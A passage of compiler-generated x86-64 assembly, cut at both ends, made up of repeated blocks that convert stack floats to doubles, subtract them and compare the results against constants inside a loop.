movsd LCPI1_8(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.177: ## in Loop: Header=BB1_8 Depth=1
movss -48(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.178: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.179: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.180: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_8(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.181: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.182: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_9(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.183: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.184: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -148(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.185: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_186
jp LBB1_186
jmp LBB1_195
LBB1_186: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_8(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_187
jp LBB1_187
jmp LBB1_195
LBB1_187: ## in Loop: Header=BB1_8 Depth=1
movss -48(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_188
jp LBB1_188
jmp LBB1_195
LBB1_188: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_189
jp LBB1_189
jmp LBB1_195
LBB1_189: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_190
jp LBB1_190
jmp LBB1_195
LBB1_190: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_8(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_191
jp LBB1_191
jmp LBB1_195
LBB1_191: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_192
jp LBB1_192
jmp LBB1_195
LBB1_192: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_193
jp LBB1_193
jmp LBB1_195
LBB1_193: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_194
jp LBB1_194
jmp LBB1_195
LBB1_194: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -148(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_195: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.196: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.197: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.198: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.199: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.200: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.201: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.202: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_8(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.203: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_18(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.204: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -164(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.205: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_206
jp LBB1_206
jmp LBB1_215
LBB1_206: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_207
jp LBB1_207
jmp LBB1_215
LBB1_207: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_208
jp LBB1_208
jmp LBB1_215
LBB1_208: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_209
jp LBB1_209
jmp LBB1_215
LBB1_209: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_210
jp LBB1_210
jmp LBB1_215
LBB1_210: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_211
jp LBB1_211
jmp LBB1_215
LBB1_211: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_212
jp LBB1_212
jmp LBB1_215
LBB1_212: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_8(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_213
jp LBB1_213
jmp LBB1_215
LBB1_213: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_18(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_214
jp LBB1_214
jmp LBB1_215
LBB1_214: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -164(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_215: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.216: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.217: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_0(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.218: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.219: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.220: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.221: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.222: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.223: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.224: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -52(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.225: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_226
jp LBB1_226
jmp LBB1_235
LBB1_226: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_227
jp LBB1_227
jmp LBB1_235
LBB1_227: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_228
jp LBB1_228
jmp LBB1_235
LBB1_228: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_229
jp LBB1_229
jmp LBB1_235
LBB1_229: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_230
jp LBB1_230
jmp LBB1_235
LBB1_230: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_231
jp LBB1_231
jmp LBB1_235
LBB1_231: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_2(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_232
jp LBB1_232
jmp LBB1_235
LBB1_232: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_233
jp LBB1_233
jmp LBB1_235
LBB1_233: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_234
jp LBB1_234
jmp LBB1_235
LBB1_234: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -52(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
